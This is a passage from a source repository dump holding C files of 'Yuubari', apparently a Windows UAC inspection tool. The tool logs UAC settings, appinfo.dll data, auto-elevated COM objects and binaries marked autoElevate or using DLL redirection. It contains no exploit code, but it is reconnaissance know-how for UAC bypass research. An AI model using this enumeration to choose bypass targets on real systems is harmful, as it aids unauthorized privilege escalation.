"content": "/*******************************************************************************\n*\n* (C) COPYRIGHT AUTHORS, 2014 - 2022\n*\n* TITLE: GLOBAL.H\n*\n* VERSION: 1.54\n*\n* DATE: 02 Dec 2022\n*\n* Common header file for the program support routines.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#pragma once\n\n#if !defined UNICODE\n#error ANSI build is not supported\n#endif\n\n#include \"shared\\libinc.h\"\n\n//disable nonmeaningful warnings.\n#pragma warning(disable: 4005) // macro redefinition\n#pragma warning(disable: 4055) // %s : from data pointer %s to function pointer %s\n#pragma warning(disable: 4091) // 'typedef ': ignored on left of '' when no variable is declared\n#pragma warning(disable: 4152) // nonstandard extension, function/data pointer conversion in expression\n#pragma warning(disable: 4201) // nonstandard extension used : nameless struct/union\n#pragma warning(disable: 6320) // exception-filter expression is the constant EXCEPTION_EXECUTE_HANDLER\n\n#include \n#include \n#include \n#include \"shared\\ntos\\ntos.h\"\n#include \"shared\\ntos\\ntsxs.h\"\n#include \"shared\\ntos\\ntbuilds.h\"\n#include \"shared\\minirtl.h\"\n#include \"shared\\_filename.h\"\n#include \"shared\\cmdline.h\"\n#include \"consts.h\"\n#include \"logger.h\"\n#include \"wintrustex.h\"\n#include \"sup.h\"\n#include \"cui.h\"\n\ntypedef VOID(WINAPI *OUTPUTCALLBACK)(PVOID OutputData);\n\n#include \"appinfo.h\"\n#include \"basic.h\"\n#include \"comobj.h\"\n#include \"fusion.h\"\n#ifdef _DEBUG\n#include \"tests\\test_fusion.h\"\n#endif\n\nextern ULONG g_NtBuildNumber;\nextern BOOL g_VerboseOutput;\n\n"
},
{
"path": "Source/Yuubari/logger.c",
"content": "/*******************************************************************************\n*\n* (C) COPYRIGHT AUTHORS, 2014 - 2025\n*\n* TITLE: LOGGER.C\n*\n* VERSION: 1.60\n*\n* DATE: 17 Jun 2025\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#include \"global.h\"\n\n/*\n* LoggerCreate\n*\n* Purpose:\n*\n* Create log file.\n*\n*/\nHANDLE LoggerCreate(\n _In_opt_ LPWSTR lpLogFileName\n)\n{\n WCHAR ch;\n LPWSTR fname = lpLogFileName;\n HANDLE hFile;\n DWORD bytesIO, lastError;\n\n if (lpLogFileName == NULL) {\n fname = TEXT(\"log.log\");\n }\n\n hFile = CreateFile(fname, GENERIC_WRITE, FILE_SHARE_READ, NULL, CREATE_ALWAYS,\n FILE_ATTRIBUTE_NORMAL, NULL);\n\n if (hFile != INVALID_HANDLE_VALUE) {\n ch = (WCHAR)0xFEFF;\n\n if (!WriteFile(hFile, &ch, sizeof(WCHAR), &bytesIO, NULL)) {\n lastError = GetLastError();\n CloseHandle(hFile);\n SetLastError(lastError);\n return INVALID_HANDLE_VALUE;\n }\n }\n return hFile;\n}\n\n/*\n* LoggerWrite\n*\n* Purpose:\n*\n* Output text to file.\n*\n*/\nVOID LoggerWrite(\n _In_ HANDLE hLogFile,\n _In_ LPWSTR lpText,\n _In_ BOOL UseReturn\n)\n{\n SIZE_T textLength = 0, bufferSize = 0;\n DWORD bytesIO = 0;\n LPWSTR Buffer = NULL;\n\n if (lpText == NULL)\n return;\n\n textLength = _strlen(lpText);\n if (textLength == 0)\n return;\n\n if (hLogFile != INVALID_HANDLE_VALUE) {\n\n if (UseReturn) {\n if (textLength > (SIZE_MAX / sizeof(WCHAR)) - 3)\n return;\n bufferSize = (textLength + 3) * sizeof(WCHAR);\n }\n else {\n if (textLength > (SIZE_MAX / sizeof(WCHAR)) - 1)\n return;\n bufferSize = (textLength + 1) * sizeof(WCHAR);\n }\n\n Buffer = (LPWSTR)supHeapAlloc(bufferSize);\n if (Buffer) {\n _strcpy(Buffer, lpText);\n if (UseReturn) _strcat(Buffer, TEXT(\"\\r\\n\"));\n textLength = _strlen(Buffer);\n WriteFile(hLogFile, Buffer, (DWORD)(textLength * sizeof(WCHAR)), &bytesIO, NULL);\n supHeapFree(Buffer);\n }\n }\n}\n"
},
{
"path": "Source/Yuubari/logger.h",
"content": "#/*******************************************************************************\n*\n* (C) COPYRIGHT AUTHORS, 2014 - 2017\n*\n* TITLE: LOGGER.H\n*\n* VERSION: 1.0F\n*\n* DATE: 13 Feb 2017\n*\n* Header file for the log file writter.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#pragma once\n\nHANDLE LoggerCreate(\n _In_opt_ LPWSTR lpLogFileName\n );\n\nVOID LoggerWrite(\n _In_ HANDLE hLogFile,\n _In_ LPWSTR lpText,\n _In_ BOOL UseReturn\n );\n"
},
{
"path": "Source/Yuubari/main.c",
"content": "/*******************************************************************************\n*\n* (C) COPYRIGHT AUTHORS, 2014 - 2026\n*\n* TITLE: MAIN.C\n*\n* VERSION: 1.61\n*\n* DATE: 12 Feb 2026\n*\n* Program entry point.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#include \"global.h\"\n#include \"Shlobj.h\"\n\nBOOL g_VerboseOutput = FALSE;\nULONG g_NtBuildNumber = 0;\nHANDLE g_LogFile = INVALID_HANDLE_VALUE;\n\nVOID LoggerWriteHeader(\n _In_ LPWSTR lpHeaderData)\n{\n LoggerWrite(g_LogFile, T_SPLIT, FALSE);\n LoggerWrite(g_LogFile, lpHeaderData, FALSE);\n LoggerWrite(g_LogFile, T_SPLIT, TRUE);\n}\n\n/*\n* AppInfoDataOutputCallback\n*\n* Purpose:\n*\n* Output callback for AppInfo scan.\n*\n*/\nVOID AppInfoDataOutputCallback(\n _In_ UAC_AI_DATA* Data\n)\n{\n LPWSTR lpLog = NULL, Text = NULL;\n SIZE_T sz = 0, textLen, nameLen, bufferChars;\n\n if (Data == NULL)\n return;\n\n sz = (_strlen(Data->Name) * sizeof(WCHAR));\n if (sz == 0 || sz > MAXDWORD - MAX_PATH)\n return;\n\n sz += MAX_PATH;\n\n lpLog = (LPWSTR)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, sz);\n if (lpLog) {\n switch (Data->Type) {\n case AiSnapinFile:\n Text = TEXT(\"SnapinFile: \");\n break;\n case AiManagementConsole:\n Text = TEXT(\"ManagementConsole: \");\n break;\n case AiAutoApproveEXE:\n Text = TEXT(\"AutoApproveEXE: \");\n break;\n case AiIncludedPFDirs:\n Text = TEXT(\"IncludedPFDir: \");\n break;\n case AiIncludedSystemDirs:\n Text = TEXT(\"IncludedSystemDir: \");\n break;\n case AiExemptedAutoApproveExes:\n Text = TEXT(\"ExemptedAutoApproveExe: \");\n break;\n case AilpIncludedWindowsDirs:\n Text = TEXT(\"IncludedWindowsDirs: \");\n break;\n case AiExcludedWindowsDirs:\n Text = TEXT(\"ExcludedWindowsDir: \");\n break;\n default:\n Text = TEXT(\"Unknown \");\n break;\n }\n\n _strcpy(lpLog, Text);\n\n textLen = _strlen(Text);\n nameLen = _strlen(Data->Name);\n bufferChars = sz / sizeof(WCHAR);\n\n if (textLen + nameLen < bufferChars) {\n _strcat(lpLog, Data->Name);\n LoggerWrite(g_LogFile, lpLog, TRUE);\n cuiPrintText(lpLog, TRUE);\n }\n\n HeapFree(GetProcessHeap(), 0, lpLog);\n }\n}\n\n/*\n* BasicDataOutputCallback\n*\n* Purpose:\n*\n* Output callback for basic UAC settings scan.\n*\n*/\nVOID WINAPI BasicDataOutputCallback(\n _In_ UAC_BASIC_DATA* Data\n)\n{\n LPWSTR lpLog = NULL;\n SIZE_T sz = 0;\n\n if (Data == NULL)\n return;\n\n sz = (_strlen(Data->Name) * sizeof(WCHAR)) + MAX_PATH;\n lpLog = (LPWSTR)supHeapAlloc(sz);\n if (lpLog) {\n _strcpy(lpLog, Data->Name);\n _strcat(lpLog, TEXT(\"=\"));\n if (Data->IsValueBool) {\n if (Data->Value == 0)\n _strcat(lpLog, TEXT(\"Disabled\"));\n else\n _strcat(lpLog, TEXT(\"Enabled\"));\n }\n else {\n ultostr(Data->Value, _strend(lpLog));\n }\n LoggerWrite(g_LogFile, lpLog, TRUE);\n cuiPrintText(lpLog, TRUE);\n supHeapFree(lpLog);\n }\n}\n\n/*\n* RegistryOutputCallback\n*\n* Purpose:\n*\n* Output callback for registry autoelevated objects scan.\n*\n*/\nVOID WINAPI RegistryOutputCallback(\n _In_ UAC_REGISTRY_DATA* Data\n)\n{\n UAC_INTERFACE_DATA* InterfaceData;\n LPOLESTR OutputString = NULL;\n\n if (Data == NULL)\n return;\n\n if (Data->DataType == UacCOMDataVirtualFactory) {\n LoggerWrite(g_LogFile, TEXT(\"VirtualFactory\"), TRUE);\n }\n if ((Data->DataType == UacCOMDataCommonType) ||\n (Data->DataType == UacCOMDataVirtualFactory))\n {\n //\n // Output current registry key to show that we are alive.\n //\n if (Data->Name)\n LoggerWrite(g_LogFile, Data->Name, TRUE);\n if (Data->Key)\n cuiPrintText(Data->Key, TRUE);\n if (Data->AppId)\n LoggerWrite(g_LogFile, Data->AppId, TRUE);\n if (Data->LocalizedString)\n LoggerWrite(g_LogFile, Data->LocalizedString, TRUE);\n\n LoggerWrite(g_LogFile, TEXT(\"\\r\\n\"), TRUE);\n }\n\n if (Data->DataType == UacCOMDataInterfaceTypeVF) {\n LoggerWrite(g_LogFile, TEXT(\"VirtualFactory Item\"), TRUE);\n }\n\n if ((Data->DataType == UacCOMDataInterfaceType) ||\n (Data->DataType == UacCOMDataInterfaceTypeVF))\n {\n InterfaceData = (UAC_INTERFACE_DATA*)(PVOID)Data;\n if (InterfaceData->Name) {\n LoggerWrite(g_LogFile, InterfaceData->Name, TRUE);\n cuiPrintText(InterfaceData->Name, TRUE);\n }\n\n if (StringFromCLSID(&InterfaceData->Clsid, &OutputString) == S_OK) {\n LoggerWrite(g_LogFile, TEXT(\"CLSID\"), TRUE);\n LoggerWrite(g_LogFile, OutputString, TRUE);\n cuiPrintText(OutputString, TRUE);\n CoTaskMemFree(OutputString);\n }\n if (StringFromIID(&InterfaceData->IID, &OutputString) == S_OK) {\n LoggerWrite(g_LogFile, TEXT(\"IID\"), TRUE);\n LoggerWrite(g_LogFile, OutputString, TRUE);\n cuiPrintText(OutputString, TRUE);\n CoTaskMemFree(OutputString);\n }\n LoggerWrite(g_LogFile, TEXT(\"\\r\\n\"), TRUE);\n cuiPrintText(TEXT(\"\\r\\n\"), TRUE);\n }\n}\n\n/*\n* FusionOutputCallback\n*\n* Purpose:\n*\n* Output callback for autoelevated applications scan.\n*\n*/\nVOID WINAPI FusionOutputCallback(\n _In_ UAC_FUSION_DATA* Data\n)\n{\n LPWSTR lpText;\n LPWSTR lpLog = NULL;\n SIZE_T sz = 0, keyNameLen, dllNameLen, prefixLen, bufferChars;\n UAC_FUSION_DATA_DLL* Dll;\n\n if (Data == NULL)\n return;\n\n if (Data->DataType == UacFusionDataCommonType) {\n\n //\n // Display only binaries with autoelevation flags if not in verbose output\n //\n if ((Data->AutoElevateState == AutoElevateUnspecified) && (g_VerboseOutput == FALSE))\n return;\n\n //\n // Output current filename\n //\n LoggerWrite(g_LogFile, TEXT(\"\\r\\n\"), FALSE);\n LoggerWrite(g_LogFile, Data->Name, TRUE);\n cuiPrintText(Data->Name, TRUE);\n\n //\n // If application has autoElevate attribute, report full info\n //\n if (Data->IsFusion) {\n switch (Data->RunLevel.RunLevel) {\n case ACTCTX_RUN_LEVEL_AS_INVOKER:\n lpText = TEXT(\"asInvoker\");\n break;\n case ACTCTX_RUN_LEVEL_HIGHEST_AVAILABLE:\n lpText = TEXT(\"highestAvailable\");\n break;\n case ACTCTX_RUN_LEVEL_REQUIRE_ADMIN:\n lpText = TEXT(\"requireAdministrator\");\n break;\n case ACTCTX_RUN_LEVEL_UNSPECIFIED:\n default:\n lpText = TEXT(\"unspecified\");\n break;\n }\n //RequestedExecutionLevel \n LoggerWrite(g_LogFile, lpText, TRUE);\n\n if (Data->RunLevel.UiAccess > 0) {\n lpText = TEXT(\"uiAccess=TRUE\");\n }\n else {\n lpText = TEXT(\"uiAccess=FALSE\");\n }\n //UIAccess state\n LoggerWrite(g_LogFile, lpText, TRUE);\n\n //autoElevate state\n if (Data->AutoElevateState != AutoElevateUnspecified) {\n switch (Data->AutoElevateState) {\n case AutoElevateEnabled:\n lpText = TEXT(\"autoElevate=TRUE\");\n break;\n case AutoElevateDisabled:\n lpText = TEXT(\"autoElevate=FALSE\");\n break;\n case AutoElevateExempted:\n lpText = TEXT(\"autoElevate=Exempted\");\n break;\n default:\n break;\n }\n LoggerWrite(g_LogFile, lpText, TRUE);\n }\n }\n else {\n // no embedded manifest\n lpText = TEXT(\"Binary without embedded manifest\");\n LoggerWrite(g_LogFile, lpText, TRUE);\n if (Data->IsOSBinary) {\n if (Data->IsSignatureValidOrTrusted == FALSE) {\n lpText = TEXT(\"Warning: signature not valid or trusted\");\n LoggerWrite(g_LogFile, lpText, TRUE);\n }\n else {\n lpText = TEXT(\"OS binary with valid digital signature\");\n LoggerWrite(g_LogFile, lpText, TRUE);\n }\n }\n }\n if (Data->IsDotNet) {\n lpText = TEXT(\"DotNet\");\n LoggerWrite(g_LogFile, lpText, TRUE);\n }\n }\n if (Data->DataType == UacFusionDataRedirectedDllType) {\n Dll = (UAC_FUSION_DATA_DLL*)Data;\n\n if (Dll->DllName == NULL || Dll->KeyName == NULL)\n return;\n\n keyNameLen = _strlen(Dll->KeyName);\n dllNameLen = _strlen(Dll->DllName);\n\n if (keyNameLen == 0 || dllNameLen == 0 || keyNameLen > MAXDWORD - dllNameLen - MAX_PATH)\n return;\n\n sz = keyNameLen + dllNameLen + MAX_PATH;\n lpLog = (LPWSTR)supHeapAlloc(sz);\n if (lpLog) {\n bufferChars = sz;\n\n _strcpy(lpLog, TEXT(\"DllRedirection: \"));\n prefixLen = _strlen(TEXT(\"DllRedirection: \"));\n\n if (prefixLen + keyNameLen + 4 + dllNameLen < bufferChars) {\n _strcat(lpLog, Dll->KeyName); // original DLL name from KeyName\n _strcat(lpLog, TEXT(\" -> \"));\n _strcat(lpLog, Dll->DllName); // redirected DLL path\n\n LoggerWrite(g_LogFile, lpLog, TRUE);\n }\n\n supHeapFree(lpLog);\n }\n }\n}\n\n/*\n* ListBasicSettings\n*\n* Purpose:\n*\n* Scan basic UAC settings.\n*\n*/\nVOID ListBasicSettings(\n VOID\n)\n{\n cuiPrintText(T_BASIC_HEAD, TRUE);\n LoggerWriteHeader(T_BASIC_HEAD);\n ScanBasicUacData((OUTPUTCALLBACK)BasicDataOutputCallback);\n}\n\n/*\n* ListCOMFromRegistry\n*\n* Purpose:\n*\n* Scan HKEY_CLASSES_ROOT for autoelevated COM objects.\n*\n*/\nVOID ListCOMFromRegistry(\n VOID\n)\n{\n INTERFACE_INFO_LIST InterfaceList;\n HRESULT hr;\n\n hr = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED);\n if (FAILED(hr))\n return;\n\n RtlSecureZeroMemory(&InterfaceList, sizeof(InterfaceList));\n\n __try {\n if (!CoEnumInterfaces(&InterfaceList))\n __leave;\n\n cuiPrintText(T_COM_HEAD, TRUE);\n LoggerWriteHeader(T_COM_HEAD);\n CoListInformation((OUTPUTCALLBACK)RegistryOutputCallback, &InterfaceList);\n\n //\n // AutoApproval COM list added since RS1.\n //\n if (g_NtBuildNumber >= NT_WIN10_REDSTONE1) {\n cuiPrintText(T_COM_APPROVE_HEAD, TRUE);\n LoggerWriteHeader(T_COM_APPROVE_HEAD);\n CoScanAutoApprovalList((OUTPUTCALLBACK)RegistryOutputCallback, &InterfaceList);\n }\n cuiPrintText(T_BROKER_APPROVE_HEAD, TRUE);\n LoggerWriteHeader(T_BROKER_APPROVE_HEAD);\n CoScanBrokerApprovalList((OUTPUTCALLBACK)RegistryOutputCallback, &InterfaceList);\n }\n __finally {\n if (InterfaceList.List)\n supHeapFree(InterfaceList.List);\n if (hr == S_OK)\n CoUninitialize();\n }\n}\n\n/*\n* ListFusion\n*\n* Purpose:\n*\n* Scan Windows directory for autoelevated apps.\n*\n*/\nVOID ListFusion(\n VOID\n)\n{\n HMODULE hModule;\n WCHAR szPath[MAX_PATH * 2];\n\n RtlSecureZeroMemory(szPath, sizeof(szPath));\n _strcpy(szPath, USER_SHARED_DATA->NtSystemRoot);\n _strcat(szPath, TEXT(\"\\\\system32\\\\wintrust.dll\"));\n\n hModule = LoadLibraryEx(szPath, NULL, 0);\n if (hModule != NULL) {\n WTGetSignatureInfo = (ptrWTGetSignatureInfo)GetProcAddress(hModule, \"WTGetSignatureInfo\");\n }\n\n //scan Windows first\n cuiPrintText(T_WINFILES_HEAD, TRUE);\n LoggerWriteHeader(T_WINFILES_HEAD);\n /*\n#ifdef _DEBUG\n FusionScanDirectory(L\"C:\\\\Windows\\\\system32\", (OUTPUTCALLBACK)FusionOutputCallback);\n return;\n#else*/\n FusionScanDirectory(USER_SHARED_DATA->NtSystemRoot, (OUTPUTCALLBACK)FusionOutputCallback);\n\n //scan program files next\n cuiPrintText(T_PFDIRFILES_HEAD, TRUE);\n LoggerWriteHeader(T_PFDIRFILES_HEAD);\n\n RtlSecureZeroMemory(szPath, sizeof(szPath));\n if (SUCCEEDED(SHGetFolderPath(NULL,\n CSIDL_PROGRAM_FILES,\n NULL,\n SHGFP_TYPE_CURRENT,\n (LPWSTR)&szPath)))\n {\n FusionScanDirectory(szPath, (OUTPUTCALLBACK)FusionOutputCallback);\n }\n //#endif\n}\n\n/*\n* ListAppInfo\n*\n* Purpose:\n*\n* Scan memory of appinfo.dll.\n*\n*/\nVOID ListAppInfo(\n VOID\n)\n{\n WCHAR szFileName[MAX_PATH * 2];\n\n cuiPrintText(T_APPINFO_HEAD, TRUE);\n LoggerWriteHeader(T_APPINFO_HEAD);\n\n /*#ifndef _DEBUG*/\n _strcpy(szFileName, USER_SHARED_DATA->NtSystemRoot);\n _strcat(szFileName, TEXT(\"\\\\system32\\\\appinfo.dll\"));\n /*#else\n _strcpy(szFileName, TEXT(\"C:\\\\appinfo\\\\19041.dll\"));\n #endif*/\n ScanAppInfo(szFileName, (OUTPUTCALLBACK)AppInfoDataOutputCallback);\n}\n\n/*\n* main\n*\n* Purpose:\n*\n* Program entry point.\n*\n*/\nVOID main()\n{\n ULONG l = 0;\n WCHAR szBuffer[MAX_PATH + 1];\n RTL_OSVERSIONINFOW osv;\n\n __security_init_cookie();\n\n HeapSetInformation(GetProcessHeap(), HeapEnableTerminationOnCorruption, NULL, 0);\n\n cuiInitialize(FALSE, NULL);\n\n cuiPrintText(T_PROGRAM_TITLE, TRUE);\n\n RtlSecureZeroMemory(&osv, sizeof(osv));\n osv.dwOSVersionInfoSize = sizeof(osv);\n RtlGetVersion((RTL_OSVERSIONINFOW*)&osv);\n\n g_NtBuildNumber = osv.dwBuildNumber;\n\n if (g_NtBuildNumber < YUUBARI_MIN_SUPPORTED_NT_BUILD) {\n cuiPrintText(TEXT(\"[UacView] Unsupported Windows version.\"), TRUE);\n ExitProcess(0);\n }\n if (g_NtBuildNumber > YUUBARI_MAX_SUPPORTED_NT_BUILD) {\n cuiPrintText(TEXT(\"\\r\\n[UacView] Not all features available for this build\\r\\n\"), TRUE);\n }\n\n RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));\n GetCommandLineParam(GetCommandLine(), 1, (LPWSTR)&szBuffer, MAX_PATH, &l);\n if (_strcmpi(szBuffer, TEXT(\"/?\")) == 0) {\n MessageBox(GetDesktopWindow(), T_HELP, T_PROGRAM_NAME, MB_ICONINFORMATION);\n ExitProcess(0);\n }\n else {\n g_VerboseOutput = (_strcmpi(szBuffer, TEXT(\"/v\")) == 0);\n }\n\n RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));\n _strcpy(szBuffer, TEXT(\"uac\"));\n ultostr(g_NtBuildNumber, _strend(szBuffer));\n _strcat(szBuffer, TEXT(\".log\"));\n\n g_LogFile = LoggerCreate(szBuffer);\n if (g_LogFile != INVALID_HANDLE_VALUE) {\n cuiPrintText(TEXT(\"Output will be logged to the file\"), TRUE);\n cuiPrintText(szBuffer, TRUE);\n }\n\n ListBasicSettings();\n ListAppInfo();\n ListCOMFromRegistry();\n ListFusion();\n\n if (g_LogFile != INVALID_HANDLE_VALUE)\n CloseHandle(g_LogFile);\n\n ExitProcess(0);\n}\n"
},
{
"path": "Source/Yuubari/sup.c",
"content": "/*******************************************************************************\n*\n* (C) COPYRIGHT AUTHORS, 2014 - 2025\n*\n* TITLE: SUP.C\n*\n* VERSION: 1.60\n*\n* DATE: 17 Jun 2025\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#include \"global.h\"\n\n/*\n* supIsCorImageFile\n*\n* Purpose:\n*\n* Return true if image has CliHeader entry, false otherwise.\n*\n*/\nBOOL supIsCorImageFile(\n _In_ PVOID ImageBase\n)\n{\n ULONG sz = 0;\n IMAGE_COR20_HEADER* CliHeader;\n\n CliHeader = (IMAGE_COR20_HEADER*)RtlImageDirectoryEntryToData(ImageBase, TRUE,\n IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR, &sz);\n\n return ((CliHeader != NULL) && (sz >= sizeof(IMAGE_COR20_HEADER)));\n}\n\n/*\n* supReadKeyString\n*\n* Purpose:\n*\n* Read string value from registry key.\n*\n*/\nLPWSTR supReadKeyString(\n _In_ HKEY hKey,\n _In_ LPWSTR KeyValue,\n _In_ PDWORD pdwDataSize\n )\n{\n LRESULT lRet;\n LPWSTR lpString = NULL;\n\n if (pdwDataSize == NULL)\n return NULL;\n\n lRet = RegQueryValueEx(hKey, KeyValue, NULL,\n NULL, NULL, pdwDataSize);\n if (lRet == ERROR_SUCCESS) {\n lpString = (LPWSTR)supHeapAlloc(*pdwDataSize);\n if (lpString != NULL) {\n lRet = RegQueryValueEx(hKey, KeyValue, NULL,\n NULL, (LPBYTE)lpString, pdwDataSize);\n if (lRet != ERROR_SUCCESS) {\n supHeapFree(lpString);\n lpString = NULL;\n }\n }\n }\n return lpString;\n}\n\n/*\n* supQueryKeyName\n*\n* Purpose:\n*\n* Get key name from handle.\n*\n*/\nPVOID supQueryKeyName(\n _In_ HKEY hKey,\n _Out_opt_ PSIZE_T ReturnedLength\n )\n{\n NTSTATUS status;\n ULONG ulen = 0;\n SIZE_T sz = 0;\n PVOID ReturnBuffer = NULL;\n\n POBJECT_NAME_INFORMATION pObjName = NULL;\n\n if (ReturnedLength)\n *ReturnedLength = 0;\n\n NtQueryObject(hKey, ObjectNameInformation, NULL, 0, &ulen);\n pObjName = (POBJECT_NAME_INFORMATION)supHeapAlloc(ulen);\n if (pObjName) {\n status = NtQueryObject(hKey, ObjectNameInformation, pObjName, ulen, NULL);\n if (NT_SUCCESS(status)) {\n if ((pObjName->Name.Buffer != NULL) && (pObjName->Name.Length > 0)) {\n sz = pObjName->Name.Length + sizeof(UNICODE_NULL);\n ReturnBuffer = supHeapAlloc(sz);\n if (ReturnBuffer) {\n RtlCopyMemory(ReturnBuffer, pObjName->Name.Buffer, pObjName->Name.Length);\n if (ReturnedLength)\n *ReturnedLength = sz;\n }\n }\n }\n supHeapFree(pObjName);\n }\n return ReturnBuffer;\n}\n\n/*\n* supIsProcess32bit\n*\n* Purpose:\n*\n* Return TRUE if given process is under WOW64, FALSE otherwise.\n*\n*/\nBOOLEAN supIsProcess32bit(\n _In_ HANDLE hProcess\n )\n{\n NTSTATUS status;\n PROCESS_EXTENDED_BASIC_INFORMATION pebi;\n\n if (hProcess == NULL) {\n return FALSE;\n }\n\n //query if this is wow64 process\n RtlSecureZeroMemory(&pebi, sizeof(pebi));\n pebi.Size = sizeof(PROCESS_EXTENDED_BASIC_INFORMATION);\n status = NtQueryInformationProcess(hProcess, ProcessBasicInformation, &pebi, sizeof(pebi), NULL);\n if (NT_SUCCESS(status)) {\n return (pebi.IsWow64Process == 1);\n }\n return FALSE;\n}\n\n/*\n* supFindPattern\n*\n* Purpose:\n*\n* Lookup pattern in buffer.\n*\n*/\nPVOID supFindPattern(\n _In_ CONST PBYTE Buffer,\n _In_ SIZE_T BufferSize,\n _In_ CONST PBYTE Pattern,\n _In_ SIZE_T PatternSize\n)\n{\n PBYTE p0 = Buffer, pnext;\n\n if (PatternSize == 0)\n return NULL;\n\n if (BufferSize < PatternSize)\n return NULL;\n\n do {\n pnext = (PBYTE)memchr(p0, Pattern[0], BufferSize);\n if (pnext == NULL)\n break;\n\n BufferSize -= (ULONG_PTR)(pnext - p0);\n\n if (BufferSize < PatternSize)\n return NULL;\n\n if (memcmp(pnext, Pattern, PatternSize) == 0)\n return pnext;\n\n p0 = pnext + 1;\n --BufferSize;\n } while (BufferSize > 0);\n\n return NULL;\n}\n\n/*\n* supRegReadDword\n*\n* Purpose:\n*\n* Read DWORD value from given key.\n*\n*/\nLRESULT supRegReadDword(\n _In_ HKEY hKey,\n _In_ LPWSTR lpValueName,\n _In_ LPDWORD Value\n)\n{\n LRESULT lResult;\n DWORD dwValue = 0, bytesIO;\n\n bytesIO = sizeof(DWORD);\n lResult = RegQueryValueEx(hKey, lpValueName,\n NULL, NULL,\n (LPBYTE)&dwValue, &bytesIO);\n\n if (lResult == ERROR_SUCCESS) {\n if (Value)\n *Value = dwValue;\n }\n return lResult;\n}\n\n/*\n* supLookupImageSectionByName\n*\n* Purpose:\n*\n* Lookup section pointer and size for section name.\n*\n*/\nPVOID supLookupImageSectionByName(\n _In_ CHAR* SectionName,\n _In_ ULONG SectionNameLength,\n _In_ PVOID DllBase,\n _Out_ PULONG SectionSize\n)\n{\n BOOLEAN bFound = FALSE;\n ULONG i;\n PVOID Section;\n IMAGE_NT_HEADERS* NtHeaders = RtlImageNtHeader(DllBase);\n IMAGE_SECTION_HEADER* SectionTableEntry;\n\n //\n // Assume failure.\n //\n if (SectionSize)\n *SectionSize = 0;\n\n if (NtHeaders == NULL)\n return NULL;\n\n SectionTableEntry = (PIMAGE_SECTION_HEADER)((PCHAR)NtHeaders +\n sizeof(ULONG) +\n sizeof(IMAGE_FILE_HEADER) +\n NtHeaders->FileHeader.SizeOfOptionalHeader);\n\n //\n // Locate section.\n //\n i = NtHeaders->FileHeader.NumberOfSections;\n while (i > 0) {\n\n if (_strncmp_a(\n (CHAR*)SectionTableEntry->Name,\n SectionName,\n SectionNameLength) == 0)\n {\n bFound = TRUE;\n break;\n }\n\n i -= 1;\n SectionTableEntry += 1;\n }\n\n //\n // Section not found, abort scan.\n //\n if (!bFound)\n return NULL;\n\n Section = (PVOID)((ULONG_PTR)DllBase + SectionTableEntry->VirtualAddress);\n if (SectionSize)\n *SectionSize = SectionTableEntry->Misc.VirtualSize;\n\n return Section;\n}\n\n/*\n* supConcatenatePaths\n*\n* Purpose:\n*\n* Concatenate 2 paths.\n*\n*/\nBOOL supConcatenatePaths(\n _Inout_ LPWSTR Target,\n _In_ LPCWSTR Path,\n _In_ SIZE_T TargetBufferSize\n)\n{\n SIZE_T TargetLength, PathLength;\n BOOL NeedSeparator;\n SIZE_T EndingLength;\n SIZE_T i;\n\n if (Target == NULL || Path == NULL || TargetBufferSize == 0)\n return FALSE;\n\n // Find current target length.\n TargetLength = 0;\n while (TargetLength < TargetBufferSize && Target[TargetLength] != 0)\n TargetLength++;\n\n if (TargetLength >= TargetBufferSize)\n return FALSE;\n\n // Strip trailing backslash from target, but preserve a lone backslash.\n if (TargetLength > 0 && Target[TargetLength - 1] == TEXT('\\\\')) {\n // Do not strip if the target is exactly a single backslash.\n if (!(TargetLength == 1 && Target[0] == TEXT('\\\\')))\n {\n TargetLength--;\n }\n }\n\n // Strip leading backslash from path only if target is non‑empty.\n if (TargetLength > 0 && Path[0] == TEXT('\\\\'))\n Path++;\n\n // Find path length (after possible stripping).\n PathLength = 0;\n while (Path[PathLength] != 0)\n PathLength++;\n\n // Determine if a separator is needed based on target's last character.\n NeedSeparator = (TargetLength > 0 && Target[TargetLength - 1] != TEXT('\\\\'));\n\n EndingLength = TargetLength + (NeedSeparator ? 1 : 0) + PathLength + 1;\n\n if (EndingLength > TargetBufferSize)\n return FALSE;\n\n // Insert separator if needed.\n if (NeedSeparator) {\n Target[TargetLength] = TEXT('\\\\');\n TargetLength++;\n }\n\n // Copy the path.\n for (i = 0; i < PathLength; i++)\n Target[TargetLength + i] = Path[i];\n\n Target[TargetLength + PathLength] = 0;\n return TRUE;\n}\n"
},
{
"path": "Source/Yuubari/sup.h",
